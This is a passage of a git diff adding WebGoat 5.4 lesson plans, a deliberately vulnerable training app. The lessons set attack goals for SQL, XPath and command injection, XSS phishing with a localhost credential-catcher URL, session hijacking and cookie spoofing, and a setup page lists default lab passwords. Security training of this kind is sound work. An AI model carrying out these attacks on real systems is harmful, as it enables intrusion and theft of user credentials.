+A Multi Level Login should provide a strong authentication.
+This is archived by adding a second layer. After having
+logged in with your user name and password you are asked
+for a 'Transaction Authentication Number' (TAN). This is
+often used by online banking. You get a list with a lots
+of TANs generated only for you by the bank. Each TAN is used only once.
+Another method is to provide the TAN by SMS. This has
+the advantage that an attacker can not get TANs provided
+by the user.
+General Goal(s):
+In this lesson you have to try to break into another account.
+You have an own account for WebGoat Financial but you want to
+log into another account only knowing the user name of the victim
+to attack.
+
\ No newline at end of file
diff --git a/webgoat-5.4/src/main/webapp/lesson_plans/English/NewLesson.html b/webgoat-5.4/src/main/webapp/lesson_plans/English/NewLesson.html
new file mode 100644
index 000000000..234b170d8
--- /dev/null
+++ b/webgoat-5.4/src/main/webapp/lesson_plans/English/NewLesson.html
@@ -0,0 +1,13 @@
+
+
+Create A WebGoat Lesson
+
+Adding lessons to WebGoat is very easy. If you have an idea that would be suitablehere.
+
+
diff --git a/webgoat-5.4/src/main/webapp/lesson_plans/English/OffByOne.html b/webgoat-5.4/src/main/webapp/lesson_plans/English/OffByOne.html
new file mode 100644
index 000000000..53bd06d01
--- /dev/null
+++ b/webgoat-5.4/src/main/webapp/lesson_plans/English/OffByOne.html
@@ -0,0 +1,21 @@
+
+
Lesson Plan Title: How to Exploit "Off-by-One" Buffer Overflow Vulnerabilities
+
Concept / Topic To Teach:
+How to Exploit a Web Based "Off-by-One" Buffer Overflow.
+
+
How the attack works:
+
+Despite being more rare, buffer overflow vulnerabilities on the web occur when a tier of the application has insufficient memory allocated to deal with the data submitted by the user. Typically, such a tier would be written in C or a similar language.
+
+For the particular subset, namely, off-by-one overflows, this lesson focuses on the consequences of being able to overwrite the position for the trailing null byte.
+
+As a result, further information is returned back to the user, due to the fact that no null byte was found.
+
Lesson Goal(s):
+
+Welcome to the OWASP Hotel ! Can you find out which room a VIP guest is staying in?
+
+* Understand how a buffer overflow vulnerability can be triggered on a web application.
+
Lesson Plan Title: Password Strength
+
Concept / Topic To Teach:
+
+Accounts are only as secure as their passwords. Most users have the same weak password everywhere. If you want to protect them against brute-force-attacks your application should have good requirements for passwords. The password should contain lower case letters, capitals and numbers. The longer the password, the better.
+
+General Goal(s):
+ For this exercise, your job is to test several passwords on https://www.cnlab.ch/codecheck
\ No newline at end of file
diff --git a/webgoat-5.4/src/main/webapp/lesson_plans/English/PathBasedAccessControl.html b/webgoat-5.4/src/main/webapp/lesson_plans/English/PathBasedAccessControl.html
new file mode 100644
index 000000000..235bd2528
--- /dev/null
+++ b/webgoat-5.4/src/main/webapp/lesson_plans/English/PathBasedAccessControl.html
@@ -0,0 +1,9 @@
+
+
Lesson Plan Title: How to Bypass a Path Based Access Control Scheme
+
Concept / Topic To Teach:
+
+In a path based access control scheme, an attacker can traverse a path by providing relative path information. Therefore an attacker can use relative paths to access files that normally are not directly accessible by anyone, or would otherwise be denied if requested directly.
+
+General Goal(s):
+The user should be able to access a file that is not in the listed directory.
\ No newline at end of file
diff --git a/webgoat-5.4/src/main/webapp/lesson_plans/English/Phishing.html b/webgoat-5.4/src/main/webapp/lesson_plans/English/Phishing.html
new file mode 100644
index 000000000..9b0127d14
--- /dev/null
+++ b/webgoat-5.4/src/main/webapp/lesson_plans/English/Phishing.html
@@ -0,0 +1,16 @@
+
+
Lesson Plan Title: Phishing with XSS
+
Concept / Topic To Teach:
+
+It is always a good practice to validate all input on the server side.
+ XSS can occur when unvalidated user input is used in an HTTP response.
+ With the help of XSS you can do a Phishing Attack and add content to a page
+ which looks official. It is very hard for a victim to determinate
+ that the content is malicious.
+
+General Goal(s):
+The user should be able to add a form asking for username
+and password. On submit the input should be sent
+to http://localhost/WebGoat/catcher?PROPERTY=yes &user=catchedUserName&password=catchedPasswordName
+
diff --git a/webgoat-5.4/src/main/webapp/lesson_plans/English/ReflectedXSS.html b/webgoat-5.4/src/main/webapp/lesson_plans/English/ReflectedXSS.html
new file mode 100644
index 000000000..9db959e07
--- /dev/null
+++ b/webgoat-5.4/src/main/webapp/lesson_plans/English/ReflectedXSS.html
@@ -0,0 +1,13 @@
+
+
Lesson Plan Title: How to Perform Reflected Cross Site Scripting (XSS)
+
Concept / Topic To Teach:
+
+It is always a good practice to validate all input on the server side.
+ XSS can occur when unvalidated user input is used in an HTTP response.
+ In a reflected XSS attack, an attacker can craft a URL with the attack
+ script and post it to another website, email it, or otherwise get a
+ victim to click on it.
+
+General Goal(s):
+For this exercise, your mission is to come up with some input containing a script. You have to try to get this page to reflect that input back to your browser, which will execute the script and do something bad.
\ No newline at end of file
diff --git a/webgoat-5.4/src/main/webapp/lesson_plans/English/RemoteAdminFlaw.html b/webgoat-5.4/src/main/webapp/lesson_plans/English/RemoteAdminFlaw.html
new file mode 100644
index 000000000..e852cbcba
--- /dev/null
+++ b/webgoat-5.4/src/main/webapp/lesson_plans/English/RemoteAdminFlaw.html
@@ -0,0 +1,11 @@
+
+
Lesson Plan Title: How to Force Browser Web Resources
+
Concept / Topic To Teach:
+Applications will often have an administrative interface that allows privileged users access to functionality that normal users shouldn't see. The application server will often have an admin interface as well.
+Standards Addressed :
+General Goal(s):
+
+Try to access the administrative interface for WebGoat. You may also try to access the administrative interface for Tomcat. The Tomcat admin interface can be accessed via a URL (/admin) and will not count towards the completion of this lesson.
+
+
diff --git a/webgoat-5.4/src/main/webapp/lesson_plans/English/RoleBasedAccessControl.html b/webgoat-5.4/src/main/webapp/lesson_plans/English/RoleBasedAccessControl.html
new file mode 100644
index 000000000..132dc235f
--- /dev/null
+++ b/webgoat-5.4/src/main/webapp/lesson_plans/English/RoleBasedAccessControl.html
@@ -0,0 +1,15 @@
+
+
Lesson Plan Title: Role Based Access Control
+
Concept / Topic To Teach:
+
+In role-based access control scheme, a role represents a set of access permissions and privileges. A user can be assigned one or more roles. A role-based access control normally consists of two parts: role permission management and role assignment. A broken role-based access control scheme might allow a user to perform accesses that are not allowed by his/her assigned roles, or somehow obtain unauthorized roles.
+
+General Goal(s):
+Your goal is to explore the access control rules that govern this site. Each role has permission to certain resources (A-F). Each user is assigned one or more roles. Only the user with the [Admin] role should have access to the 'F' resources. In a successful attack, a user doesn't have the [Admin] role can access resource F.
+Lesson Resources:
+Org Chart
+Access Control Matrix
+Database Schema
diff --git a/webgoat-5.4/src/main/webapp/lesson_plans/English/SQLInjection.html b/webgoat-5.4/src/main/webapp/lesson_plans/English/SQLInjection.html
new file mode 100644
index 000000000..95f4ae304
--- /dev/null
+++ b/webgoat-5.4/src/main/webapp/lesson_plans/English/SQLInjection.html
@@ -0,0 +1,14 @@
+
+
Lesson Plan Title: How to Perform a SQL Injection
+
Concept / Topic To Teach:
+
+SQL injection attacks represent a serious threat to any database-driven site. The methods behind an attack are easy to learn and the damage caused can range from considerable to complete system compromise. Despite these risks, an incredible number of systems on the internet are susceptible to this form of attack.
+General Goal(s):
+For this exercise, you will perform SQLInjection attacks. You will also implement code changes in the web application to defeat these attacks.
+
\ No newline at end of file
diff --git a/webgoat-5.4/src/main/webapp/lesson_plans/English/SameOriginPolicyProtection.html b/webgoat-5.4/src/main/webapp/lesson_plans/English/SameOriginPolicyProtection.html
new file mode 100644
index 000000000..b7db5d10e
--- /dev/null
+++ b/webgoat-5.4/src/main/webapp/lesson_plans/English/SameOriginPolicyProtection.html
@@ -0,0 +1,13 @@
+
+
Lesson Plan Title: Same Origin Policy Protection
+
Concept / Topic To Teach:
+
+A key element of AJAX is the XMLHttpRequest (XHR), which allows javascript to make asynchronous
+calls from the client side to a server. However, as a security measure these requests may
+only be made to the server from which the client page originated.
+
+General Goal(s):
+This exercise demonstrates the Same Origin Policy Protection. XHR requests
+can only be passed back to the originating server. Attempts to pass data to
+a non-originating server will fail.";
diff --git a/webgoat-5.4/src/main/webapp/lesson_plans/English/SessionFixation.html b/webgoat-5.4/src/main/webapp/lesson_plans/English/SessionFixation.html
new file mode 100644
index 000000000..c7e70f3aa
--- /dev/null
+++ b/webgoat-5.4/src/main/webapp/lesson_plans/English/SessionFixation.html
@@ -0,0 +1,33 @@
+
+
Lesson Plan Title: Session Fixation
+
Concept / Topic To Teach:
+How to steal a session with a 'Session Fixation'
+
+
+How the attacks works:
+
+A user is recognized by the server by an unique Session ID. If a
+user has logged in and is authorized he does not have to
+reauthorize when he revisits the application as the user is recognized
+by the Session ID. In some applications it is possible to deliver
+the Session ID in the Get-Request. Here is where the attack starts.
+
+An attacker can send a hyperlink to a victim with a chosen Session ID.
+This can be done for example by a prepared mail which looks like an
+official mail from the application administrator.
+If the victim clicks on the link and logs in he is authorized
+by the Session ID the attacker has chosen. The attacker
+can visit the page with the same ID and is recognized as the victim and
+gets logged in without authorization.
+
General Goal(s):
+
+This lesson has several stages. You play the attacker but also the victim.
+After having done this lesson it should be understood how
+a Session Fixation in general works. It should be also understood that
+it is a bad idea to use the Get-Request for Session IDs.
+
+
diff --git a/webgoat-5.4/src/main/webapp/lesson_plans/English/SilentTransactions.html b/webgoat-5.4/src/main/webapp/lesson_plans/English/SilentTransactions.html
new file mode 100644
index 000000000..d3377dce8
--- /dev/null
+++ b/webgoat-5.4/src/main/webapp/lesson_plans/English/SilentTransactions.html
@@ -0,0 +1,24 @@
+
+
Lesson Plan Title: How to Perform Silent Transactions Attacks.
+
Concept / Topic To Teach:
+This lesson teaches how to perform silent transactions attacks.
+
+
+How the attacks works:
+
+Any system that silently processes transactions using a single submission is dangerous to the client.
+For example, if a normal web application allows a simple URL submission, a preset session attack will
+allow the attacker to complete a transaction without the user’s authorization.
+In Ajax, it gets worse: the transaction is silent; it happens with no user feedback on the page,
+so an injected attack script may be able to steal money from the client without authorization.
+
General Goal(s):
+
+* This is a sample internet banking application - money transfer page.
+
Lesson Plan Title: How to Create a SOAP Request
+
Concept / Topic To Teach:
+
+Web Services communicate through the use of SOAP requests. These requests are submitted to a web service in an attempt to execute a function defined in the web service definition language (WSDL). Let's learn something about WSDL files. Check out WebGoat's web service description language (WSDL) file.
+General Goal(s):
+Try connecting to the WSDL with a browser or Web Service tool. The URL for the web service is: http://localhost/WebGoat/services/SoapRequest The WSDL can usually be viewed by adding a ?WSDL on the end of the web service request. You must access 2 of the operations to pass this lesson.
+
\ No newline at end of file
diff --git a/webgoat-5.4/src/main/webapp/lesson_plans/English/SqlNumericInjection.html b/webgoat-5.4/src/main/webapp/lesson_plans/English/SqlNumericInjection.html
new file mode 100644
index 000000000..a081c1a29
--- /dev/null
+++ b/webgoat-5.4/src/main/webapp/lesson_plans/English/SqlNumericInjection.html
@@ -0,0 +1,14 @@
+
+
Lesson Plan Title: How to Perform Numeric SQL Injection
+
Concept / Topic To Teach:
+
+SQL injection attacks represent a serious threat to any database-driven site. The methods behind an attack are easy to learn and the damage caused can range from considerable to complete system compromise. Despite these risks, an incredible number of systems on the internet are susceptible to this form of attack.
+General Goal(s):
+The form below allows a user to view weather data. Try to inject an SQL string that results in all the weather data being displayed.
+
\ No newline at end of file
diff --git a/webgoat-5.4/src/main/webapp/lesson_plans/English/SqlStringInjection.html b/webgoat-5.4/src/main/webapp/lesson_plans/English/SqlStringInjection.html
new file mode 100644
index 000000000..2dc84b697
--- /dev/null
+++ b/webgoat-5.4/src/main/webapp/lesson_plans/English/SqlStringInjection.html
@@ -0,0 +1,14 @@
+
+
Lesson Plan Title: How to Perform String SQL Injection
+
Concept / Topic To Teach:
+
+SQL injection attacks represent a serious threat to any database-driven site. The methods behind an attack are easy to learn and the damage caused can range from considerable to complete system compromise. Despite these risks, an incredible number of systems on the internet are susceptible to this form of attack.
+General Goal(s):
+The form below allows a user to view their credit card numbers. Try to inject an SQL string that results in all the credit card numbers being displayed. Try the user name of 'Smith'.
+
\ No newline at end of file
diff --git a/webgoat-5.4/src/main/webapp/lesson_plans/English/StoredXss.html b/webgoat-5.4/src/main/webapp/lesson_plans/English/StoredXss.html
new file mode 100644
index 000000000..e2662164f
--- /dev/null
+++ b/webgoat-5.4/src/main/webapp/lesson_plans/English/StoredXss.html
@@ -0,0 +1,9 @@
+
+
Lesson Plan Title: How to Perform Stored Cross Site Scripting (XSS)
+
Concept / Topic To Teach:
+
+It is always a good practice to scrub all input, especially those inputs that will later be used as parameters to OS commands, scripts, and database queries. It is particularly important for content that will be permanently stored somewhere in the application. Users should not be able to create message content that could cause another user to load an undesireable page or undesireable content when the user's message is retrieved.
+
+General Goal(s):
+The user should be able to add message content that cause another user to load an undesireable page or content.
\ No newline at end of file
diff --git a/webgoat-5.4/src/main/webapp/lesson_plans/English/ThreadSafetyProblem.html b/webgoat-5.4/src/main/webapp/lesson_plans/English/ThreadSafetyProblem.html
new file mode 100644
index 000000000..1b01a915d
--- /dev/null
+++ b/webgoat-5.4/src/main/webapp/lesson_plans/English/ThreadSafetyProblem.html
@@ -0,0 +1,22 @@
+
+
+
+
+ Lesson Plan
+
+
+
+
+
Lesson Plan Title: How to Exploit Thread Safety Problems
+
Concept / Topic To Teach:
+
+ Web applications can handle many HTTP requests simultaneously. Developers often use variables that are not thread safe. Thread safety means that the fields of an object or class always maintain a valid state when used concurrently by multiple threads. It is often possible to exploit a concurrency bug by loading the same page as another user at the exact same time. Because all threads share the same method area, and the method area is where all class variables are stored, multiple threads can attempt to use the same class variables concurrently. General Goal(s):
+The user should be able to exploit the concurrency error in the web application and view login information for another user that is attempting the same function at the same time. This will require the use of two browsers .
+How To Configure Tomcat Introduction
+WebGoat comes with default configurations for Tomcat. This page will explain these configurations
+and other possible configurations for Tomcat. This is just
+a short description which should be enough in most cases. For more advanced tasks please
+refer to the Tomcat documentation. Please note that all solutions
+are written for the standard configurations on port 80. If you use another port you have
+to adjust the solution to your configuration.
+
+The Standard Configurations
+There are two standard Tomcat configurations. In the basic configurations you use the server on your localhost.
+ Both are identically with the only difference
+ that in one tomcat is running on port 80 and 443 (SSL) and in the other tomcat is running on port 8080 and 8443. In Linux you have
+ to start WebGoat as root or with sudo if you want to run it on port 80 and
+ 443.
+ As running software as root is dangerous we strongly advice to use
+the port 8080 and 8443. In Windows you can
+run WebGoat.bat to run it on port 80 and WebGoat_8080.bat to run it on port 8080. In Linux you
+can use webgoat.sh and run it with webgoat.sh start80 or webgoat.sh start8080. The user in these
+configurations is guest with password guest
+
+
+Server Configurations
+
+If you are a single user of WebGoat the standard configurations should be
+enough but if you want to use WebGoat in laboratory or in class there
+might be the need to change the configurations. Before changing
+the configurations we recommend doing a backup of the files you change.
+
+
+Change Ports
+
+To change the ports open the server_80.xml which you find in tomcat/conf and change the
+non-SSL port. If you want to use it on port 8079 for example:
+
+
+
+ <!-- Define a non-SSL HTTP/1.1 Connector on port 8079 -->
+ <Connector address="127.0.0.1" port="8079"...
+
+
+You can also change the SSL connector to another port of course.
+In this example to port 8442:
+
+
+ <!-- Define a SSL HTTP/1.1 Connector on port 8442 -->
+ <Connector address="127.0.0.1" port="8442"...
+
+Make WebGoat Reachable From Another Client
+THIS MAKES IT POSSIBLE TO REALLY ATTACK YOUR SERVER! DO NOT DO THIS
+ UNTIL YOU KNOW WHAT YOU ARE DOING. THIS CONFIGURATION SHOULD BE ONLY USED IN
+SAFE NETWORKS!
+By its default configurations WebGoat is only
+reachable within the localhost. In a laboratory or a class
+there is maybe the need of having a server and a few clients.
+In this case it is possible to make WebGoat reachable.
+
+The reason why WebGoat is only reachable within the localhost is
+the parameter address in the connectors for the non-SSL and SSL connection in server_80.xml. It is set
+to 127.0.0.1. The applications only listens on the port of this address for
+incoming connections if it is set. If you remove this parameter the server listens on all IPs on the
+specific port.
+
+Permit Only Certain Clients Connection
+
+If you have made WebGoat reachable it is reachable for
+all clients. If you want to make it reachable only for certain clients specified
+by there IP you can archive this by using a 'Remote Address Filter'.
+The filter can be set in a whitebox or blackbox approach. Here is
+only discussed the whitebox approach. You have to add following lines to the Host section of web_80.xml:
+
+
+ <Valve className="org.apache.catalina.valves.RemoteAddrValve"
+ allow="127.0.0.1,ip1,ip2"/>
+
+In this case only localhost, ip1 and ip2 are permitted to connect.
+
+WebGoat Default Users and Roles for Tomcat
+
+WebGoat requires the following users and roles to be configured in order for the application to run.
+
+ >role rolename="webgoat_basic"/<
+ >role rolename="webgoat_admin"/<
+ >role rolename="webgoat_user"/<
+ >user username="webgoat" password="webgoat" roles="webgoat_admin"/<
+ >user username="basic" password="basic" roles="webgoat_user,webgoat_basic"/<
+ >user username="guest" password="guest" roles="webgoat_user"/<
+
+
+Adding Users
+
+Usually using WebGoat you just use the user guest with the password guest.
+But maybe in laboratory you have made a setup with one server and a lot of
+clients. In this case you might want to have a user for every client
+ and you have to alter tomcat-users.xml
+in tomcat/conf as the users are stored there. We recommend not to use real passwords
+as the passwords are stored in plain text in this file!
+
+Add User
+
+Adding a user is straight forward. You can use the guest entry as an example. The added
+users should have the same role as the guest user. Add lines like this to the file:
+
+
+ <user name="student1" password="password1" roles="webgoat_user"/>
+ <user name="student2" password="password2" roles="webgoat_user"/>
+ ...
+
+
+
\ No newline at end of file
diff --git a/webgoat-5.4/src/main/webapp/lesson_plans/English/TraceXSS.html b/webgoat-5.4/src/main/webapp/lesson_plans/English/TraceXSS.html
new file mode 100644
index 000000000..2358d4fc4
--- /dev/null
+++ b/webgoat-5.4/src/main/webapp/lesson_plans/English/TraceXSS.html
@@ -0,0 +1,9 @@
+
+
Lesson Plan Title: How to Perform Cross Site Tracing (XST) Attacks
+
Concept / Topic To Teach:
+
+It is always a good practice to scrub all input, especially those inputs that will later be used as parameters to OS commands, scripts, and database queries. It is particularly important for content that will be permanently stored somewhere in the application. Users should not be able to create message content that could cause another user to load an undesireable page or undesireable content when the user's message is retrieved.
+General Goal(s):
+Tomcat is configured to support the HTTP TRACE command. Your goal is to perform a Cross Site Tracing (XST) attack.
+
\ No newline at end of file
diff --git a/webgoat-5.4/src/main/webapp/lesson_plans/English/UncheckedEmail.html b/webgoat-5.4/src/main/webapp/lesson_plans/English/UncheckedEmail.html
new file mode 100644
index 000000000..db3c630e9
--- /dev/null
+++ b/webgoat-5.4/src/main/webapp/lesson_plans/English/UncheckedEmail.html
@@ -0,0 +1,9 @@
+
+
Lesson Plan Title: How to Exploit Unchecked Email
+
Concept / Topic To Teach:
+
+It is always a good practice to validate all inputs. Most sites allow non-authenticated users to send email to a 'friend'. This is a great mechanism for spammers to send out email using your corporate mail server.
+
+General Goal(s):
+The user should be able to send and obnoxious email message.
diff --git a/webgoat-5.4/src/main/webapp/lesson_plans/English/UsefulTools.html b/webgoat-5.4/src/main/webapp/lesson_plans/English/UsefulTools.html
new file mode 100644
index 000000000..7c23aa847
--- /dev/null
+++ b/webgoat-5.4/src/main/webapp/lesson_plans/English/UsefulTools.html
@@ -0,0 +1,53 @@
+
+
+Useful Tools
+
+Below is a list of tools we've found useful in solving the WebGoat lessons. You will need WebScarab or Paros to solve most of the lessons.
+WebScarab:
+
+Like WebGoat, WebScarab is a part of OWASP.
+WebScarab is a proxy for analyzing applications that
+communicate using the HTTP and HTTPS protocols. Because WebScarab
+operates as an intercepting proxy, we can review and modify requests
+and responses.http://www.owasp.org/index.php/Category:OWASP_WebScarab_Project
+OWASP Sourceforge Page
+After installing WebScarab and configuring your browser to use it as proxy on localhost we can start. If you are using localhost for your Tomcat server, remember to put a "." after the hostname when browsing to WebGoat .
+Firebug:
+
+Firebug is an add-on for the Firefox browser. We can use it to inspect, edit and monitor CSS, HTML and JavaScript.http://www.getfirebug.com
+
IEWatch:
+
+IEWatch is a tool to analyze HTTP and HTML for users of the Internet Explorer.http://www.iewatch.com
+
+Wireshark
+
+Wireshark is a network protocol analyzer. You can sniff network traffic and gather useful
+informations this way.http://www.wireshark.org
+
+
+
+Scanner:
+
+There are many vulnerability scanners for your own web applications. They can find XSS, Injection Flaws and other vulnerabilities. Below are links to two open source scanner. http://www.nessus.org http://www.parosproxy.org
+
+
+
Lesson Plan Title: How to Perform WSDL Scanning
+
Concept / Topic To Teach:
+
+Web Services communicate through the use of SOAP requests. These requests are submitted to a web service in an attempt to execute a function defined in the web service definition language (WSDL) file.
+General Goal(s):
+This screen is the API for a web service. Check the WSDL file for this web service and try to get some customer credit numbers.
+
\ No newline at end of file
diff --git a/webgoat-5.4/src/main/webapp/lesson_plans/English/WeakAuthenticationCookie.html b/webgoat-5.4/src/main/webapp/lesson_plans/English/WeakAuthenticationCookie.html
new file mode 100644
index 000000000..9c9b86c8a
--- /dev/null
+++ b/webgoat-5.4/src/main/webapp/lesson_plans/English/WeakAuthenticationCookie.html
@@ -0,0 +1,12 @@
+
+
Lesson Plan Title: How to Spoof an Authentication Cookie
+
Concept / Topic To Teach:
+
+Many applications will automatically log a user into their site if the right authentication cookie is specified. Some times the cookie values can be guessed if the algorithm for generating the cookie can be obtained. Some times the cookies are left on the client machine and can be stolen by exploiting another system vulnerability. Some times the cookies maybe intercepted using Cross site scripting. This lesson tries to make the student aware of authentication cookies and presents the student with a way to defeat the cookie authentication method in this lesson.General Goal(s):
+
+ The user should be able to bypass the authentication check.
+Login using the webgoat/webgoat account to see what happens. You may also try aspect/aspect. When you understand the authentication cookie, try changing your identity to alice.
+
\ No newline at end of file
diff --git a/webgoat-5.4/src/main/webapp/lesson_plans/English/WeakSessionID.html b/webgoat-5.4/src/main/webapp/lesson_plans/English/WeakSessionID.html
new file mode 100644
index 000000000..45157e0b5
--- /dev/null
+++ b/webgoat-5.4/src/main/webapp/lesson_plans/English/WeakSessionID.html
@@ -0,0 +1,9 @@
+
+
Lesson Plan Title: How to Hijack a Session
+
Concept / Topic To Teach:
+
+Application developers who develop their own session IDs frequently forget to incorporate the complexity and randomness necessary for security. If the user specific session ID is not complex and random, then the application is highly susceptible to session-based brute force attacks.
+General Goal(s):
+Try to access an authenticated session belonging to someone else.
+
\ No newline at end of file
diff --git a/webgoat-5.4/src/main/webapp/lesson_plans/English/WelcomeScreeen.html b/webgoat-5.4/src/main/webapp/lesson_plans/English/WelcomeScreeen.html
new file mode 100644
index 000000000..be93e40e2
--- /dev/null
+++ b/webgoat-5.4/src/main/webapp/lesson_plans/English/WelcomeScreeen.html
@@ -0,0 +1,16 @@
+
+
Lesson Plan Title:Welcome
+
Concept / Topic To Teach:
+This lesson presents the basics for understanding the transfer of data between the browser and the web application.
+Standards Addressed:
+General Goal(s):
+Specific Objectives:
+Required Materials:
+Anticipatory Set (Lead-In):
+Step-By-Step Procedures:
+Plan For Independent Practice:
+Closure (Reflect Anticipatory Set):
+Assessment Based On Objectives:
+Extensions (For Gifted Students):
+Possible Connections To Other Subjects:
\ No newline at end of file
diff --git a/webgoat-5.4/src/main/webapp/lesson_plans/English/WsSAXInjection.html b/webgoat-5.4/src/main/webapp/lesson_plans/English/WsSAXInjection.html
new file mode 100644
index 000000000..23a2e8607
--- /dev/null
+++ b/webgoat-5.4/src/main/webapp/lesson_plans/English/WsSAXInjection.html
@@ -0,0 +1,12 @@
+
+
Lesson Plan Title: How to Perform Web Service SAX Injection
+
Concept / Topic To Teach:
+
+Web Services communicate through the use of SOAP requests. These requests are submitted to a web service in an attempt to execute a function defined in the web service definition language (WSDL) file.
+General Goal(s):
+Some web interfaces make use of Web Services in the background. If the frontend relies on the web service for all input validation, it may be possible to corrupt the XML that the web interface sends.
+
+
Lesson Plan Title: How to Perform Web Service SQL Injection
+
Concept / Topic To Teach:
+
+Web Services communicate through the use of SOAP requests. These requests are submitted to a web service in an attempt to execute a function defined in the web service definition language (WSDL) file.
+General Goal(s):
+Check the web service description language (WSDL) file and try to obtain multiple customer credit card numbers. You will not see the results returned to this screen. When you believe you have suceeded, refresh the page and look for the 'green star'.
+
\ No newline at end of file
diff --git a/webgoat-5.4/src/main/webapp/lesson_plans/English/XMLInjection.html b/webgoat-5.4/src/main/webapp/lesson_plans/English/XMLInjection.html
new file mode 100644
index 000000000..fc9c73697
--- /dev/null
+++ b/webgoat-5.4/src/main/webapp/lesson_plans/English/XMLInjection.html
@@ -0,0 +1,19 @@
+
+
Lesson Plan Title: How to Perform XML Injection Attacks.
+
Concept / Topic To Teach:
+ This lesson teaches how to perform XML Injection attacks.
+
+
+How the attacks works:
+
+AJAX applications use XML to exchange information with the server. This XML can be easily intercepted and altered by a malicious attacker.
+
+
General Goal(s):
+
+WebGoat-Miles Reward Miles shows all the rewards available. Once you've entered your account ID, the lesson will show you your balance and the products you can afford. Your goal is to try to add more rewards to your allowed set of rewards. Your account ID is 836239.
+
+
diff --git a/webgoat-5.4/src/main/webapp/lesson_plans/English/XPATHInjection.html b/webgoat-5.4/src/main/webapp/lesson_plans/English/XPATHInjection.html
new file mode 100644
index 000000000..926d8f151
--- /dev/null
+++ b/webgoat-5.4/src/main/webapp/lesson_plans/English/XPATHInjection.html
@@ -0,0 +1,22 @@
+
+
Lesson Plan Title: How to Perform XPATH Injection Attacks.
+
Concept / Topic To Teach:
+ This lesson teaches how to perform XPath Injection attacks.
+
+
+How the attacks works:
+
+Similar to SQL Injection, XPATH Injection attacks occur when a web site uses user supplied information to query XML data. By sending intentionally malformed information into the web site, an attacker can find out how the XML data is structured or access data that they may not normally have access to.
+They may even be able to elevate their privileges on the web site if the xml data is being used for authentication (such as an xml based user file).
+
+Querying XML is done with XPath, a type of simple descriptive statement that allows the xml query to locate a piece of information. Like SQL you can specify certain attributes to find and patterns to match. When using XML for a web site it is common to accept some form of input on the query string to identify the content to locate and display on the page. This input must be sanitized to verify that it doesn't mess up the XPath query and return the wrong data.
+
+
+
General Goal(s):
+
+The form below allows employees to see all their personal data including their salaries. Your account is Mike/test123. Your goal is to try to see other employees data as well.
+
diff --git a/webgoat-5.4/src/main/webapp/lesson_plans/German/BasicAuthentication.html b/webgoat-5.4/src/main/webapp/lesson_plans/German/BasicAuthentication.html
new file mode 100644
index 000000000..65490ef0c
--- /dev/null
+++ b/webgoat-5.4/src/main/webapp/lesson_plans/German/BasicAuthentication.html
@@ -0,0 +1,15 @@
+
+
Lehrplan: Basic Authentication
+
Lehrinhalt:
+
+"Basic Authentication" wird benutzt um Server-seitige Resource zu schützen. Wird eine Anfrage an eine geschützte Resource gestellt, so sendet der Webserver ein "401 authentication request" mit der Antwort auf diese Anfrage.
+Dann fragt, auf der Client Seite, der Browser den Benutzer mittels einer Dialogbox nach Benutzername und Passwort für diese Resource.
+Der Browser enkodiert Benutzername und Passwort mit base64 und sendet diese Zugangsdaten zum Webserver.
+Daraufhin validiert der Webserver Benutzername und Passwort und gibt als Antwort die angeforderte Resource zurück falls die übermittelten Zugangsdaten korrekt sind.
+Die Zugangsdaten werden vom Browser bei jedem weiteren Zugriff auf geschützte Resourcen mitgesendet ohne dass der Benutzer
+sie ein weiteres Mal eingeben muss.Grundsätzliche(s) Ziel(e):
+Das Ziel dieser Lektion ist es "Basic Authentication" zu verstehen und die folgenden Fragen zu beantworten.
+
diff --git a/webgoat-5.4/src/main/webapp/lesson_plans/German/CommandInjection.html b/webgoat-5.4/src/main/webapp/lesson_plans/German/CommandInjection.html
new file mode 100644
index 000000000..a8de365cb
--- /dev/null
+++ b/webgoat-5.4/src/main/webapp/lesson_plans/German/CommandInjection.html
@@ -0,0 +1,16 @@
+
+
Lehrplan: Einschleusen von Programmcode
+
Konzept:
+
+Das Einschleusen von Programmcode stellt eine ernst zu nehmende Bedrohung für dynamische Webseiten dar. Entsprechende Angriffe
+sind leicht zu lernen und der verursachte Schaden ist schwer bzw. entspricht der Kompromittierung des kompletten Systems.
+Trotz dieses Gefahrenpotentials ist eine unglaubliche Anzahl von Systemen im Internet für diese Form des Angriffs verwundbar.
+Dieser Angriff ist zwar leicht durchzuführen, allerdings ist er auch mit ein wenig gesundem Menschenverstand und Vorausdenken
+leicht zu verhindern. Die anerkannte Vorgehensweise zur Verhinderung dieser Angriffstypen
+besteht darin alle Eingabedaten zu säubern, insbesondere die Daten die in Betriebssystembefehlen,
+Skripten und Datenbankabfragen eingebaut werden.
+Grundsätzliche(s) Ziel(e):
+
+Schleusen Sie einen Befehl in das darunterliegende Betriebssystem ein.
+
\ No newline at end of file
diff --git a/webgoat-5.4/src/main/webapp/lesson_plans/German/HiddenFieldTampering.html b/webgoat-5.4/src/main/webapp/lesson_plans/German/HiddenFieldTampering.html
new file mode 100644
index 000000000..c4606ac75
--- /dev/null
+++ b/webgoat-5.4/src/main/webapp/lesson_plans/German/HiddenFieldTampering.html
@@ -0,0 +1,14 @@
+
+
Lehrplan: Versteckte Felder ausnutzen
+
Konzept:
+
+Entwickler benutzen versteckte Formularfelder zur Besucherverfolgung, für den Login, für Preisinformationen und andere
+Informationen. Dies ist ein sehr einfacher und bequemer Mechnismus für Entwickler, allerdings werden die Werte
+diese Felder nur selten geprüft bevor sie benutzt werden. In dieser Lektion lernt man wie man versteckte Felder
+zu seinem Vorteil manipulieren kann.
+
+ Grundsätzliche(s) Ziel(e):
+Nutzen Sie ein verstecktes Formularfeld aus, um den HD Fernseher zu einem falschen Preis zu kaufen.
diff --git a/webgoat-5.4/src/main/webapp/lesson_plans/German/HtmlClues.html b/webgoat-5.4/src/main/webapp/lesson_plans/German/HtmlClues.html
new file mode 100644
index 000000000..70d63e5ee
--- /dev/null
+++ b/webgoat-5.4/src/main/webapp/lesson_plans/German/HtmlClues.html
@@ -0,0 +1,13 @@
+
+
Lehrplan: Nützliche Hinweise in HTML entdecken.
+
Konzept:
+
+ Entwickler lassen oftmals Kommentare wie FIXME's, TODO's, Code Broken, Hack usw. im Quellcode.
+ Durchsuchen Sie den Quellcode nach allem was für Sie nach Passwörtern, Hintertüren oder anderen Unregelmäßigkeiten aussieht.
+
+
+Grundsätzliche(s) Ziel(e):
+Sie suchen und finden Hinweise im Quellcode die es Ihnen erlauben sich anzumelden.
\ No newline at end of file
diff --git a/webgoat-5.4/src/main/webapp/lesson_plans/German/HttpBasics.html b/webgoat-5.4/src/main/webapp/lesson_plans/German/HttpBasics.html
new file mode 100644
index 000000000..995912eeb
